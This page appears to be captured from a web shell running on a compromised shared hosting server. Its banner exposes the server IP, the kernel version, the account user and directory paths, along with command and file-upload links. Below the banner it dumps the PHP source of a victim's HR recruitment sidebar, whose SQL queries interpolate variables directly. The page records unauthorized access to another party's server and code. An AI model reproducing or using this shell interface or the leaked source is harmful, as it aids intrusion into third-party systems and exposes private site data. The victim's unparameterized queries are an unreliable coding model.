Server IP : 103.53.40.154 / Your IP : 3.14.250.187 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/ppcad7no/fastelevator.in/../digitala2z.com/down-hrms/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<a href="javascript:void(0);" class="list-group-item active" style="margin-top:10px; cursor:default;"> <span class="glyphicon glyphicon-refresh"></span> Fresh Candidates </a> <?php $todayFrsh = db_scalar("select count(*) from party_statusdate where user_id='$_SESSION[admin_user_id]' and next_date<='$crDate' and status='1'"); ?> <a href="fresh-candidates-today.php" class="list-group-item"> <span class="glyphicon glyphicon-hand-right"></span> Today <span class="badge"><?=$todayFrsh?></span> </a> <?php $totalFrsh = db_scalar("select count(*) from party_statusdate where user_id='$_SESSION[admin_user_id]' and status='1'"); ?> <a href="fresh-candidates-total.php" class="list-group-item"> <span class="glyphicon glyphicon-hand-right"></span> Total <span class="badge"><?=$totalFrsh?></span> </a> <a href="javascript:void(0);" class="list-group-item active" style="cursor:default;"> <span class="glyphicon glyphicon-user"></span> Follow Up Candidates </a> <?php $todayFollow = db_scalar("select count(*) from party_statusdate where user_id='$_SESSION[admin_user_id]' and next_date<='$crDate' and status='2'"); ?> <a href="followup-candidates-today.php" class="list-group-item"> <span class="glyphicon glyphicon-hand-right"></span> Today <span class="badge"><?=$todayFollow?></span> </a> <?php $totalFollow = db_scalar("select count(*) from party_statusdate where user_id='$_SESSION[admin_user_id]' and status='2'"); ?> <a href="followup-candidates-total.php" class="list-group-item"> <span class="glyphicon glyphicon-hand-right"></span> Total <span class="badge"><?=$totalFollow?></span> </a> <a href="javascript:void(0);" class="list-group-item active" style="cursor:default;"> <span class="glyphicon glyphicon-user"></span> Positive Candidates </a> <?php $todayPositv = db_scalar("select count(*) from party_statusdate where user_id='$_SESSION[admin_user_id]' and next_date<='$crDate' and status='3'"); ?> <a href="positive-candidates-today.php" class="list-group-item"> <span class="glyphicon glyphicon-hand-right"></span> Today's Interviews <span class="badge"><?=$todayPositv?></span> </a> <?php $totalPositv = db_scalar("select count(*) from party_statusdate where user_id='$_SESSION[admin_user_id]' and status='3'"); ?> <a href="positive-candidates-total.php" class="list-group-item"> <span class="glyphicon glyphicon-hand-right"></span> Upcoming Interviews <span class="badge"><?=$totalPositv?></span> </a> <a href="javascript:void(0);" class="list-group-item active" style="cursor:default;"> <span class="glyphicon glyphicon-check"></span> Selected Candidates </a> <?php $todaySelected = db_scalar("select count(*) from party_statusdate where user_id='$_SESSION[admin_user_id]' and selected_party_date='$crDate' and status='4'"); ?> <a href="selected-candidates-today.php" class="list-group-item"> <span class="glyphicon glyphicon-hand-right"></span> Today <span class="badge"><?=$todaySelected?></span> </a> <?php $totalSelected = db_scalar("select count(*) from party_statusdate where user_id='$_SESSION[admin_user_id]' and status='4'"); ?> <a href="selected-candidates-total.php" class="list-group-item"> <span class="glyphicon glyphicon-hand-right"></span> Total <span class="badge"><?=$totalSelected?></span> </a> <?php $totalRejected = db_scalar("select count(*) from party_statusdate where user_id='$_SESSION[admin_user_id]' and status='5'"); ?> <a href="rejected-candidates.php" class="list-group-item active"> <span class="glyphicon glyphicon-thumbs-down"></span> Rejected <span class="badge"><?=$totalRejected?></span> </a> <?php $totalNI = db_scalar("select count(*) from party_statusdate where user_id='$_SESSION[admin_user_id]' and status='6'"); ?> <a href="ni-candidates.php" class="list-group-item active" style="margin-top:10px;"> <span class="glyphicon glyphicon-remove"></span> Not Interested <span class="badge"><?=$totalNI?></span> </a> <?php $totalBlock = db_scalar("select count(*) from party_statusdate where user_id='$_SESSION[admin_user_id]' and status='7'"); ?> <a href="block-candidates.php" class="list-group-item active" style="margin-top:10px;"> <span class="glyphicon glyphicon-remove-circle"></span> Block <span class="badge"><?=$totalBlock?></span> </a>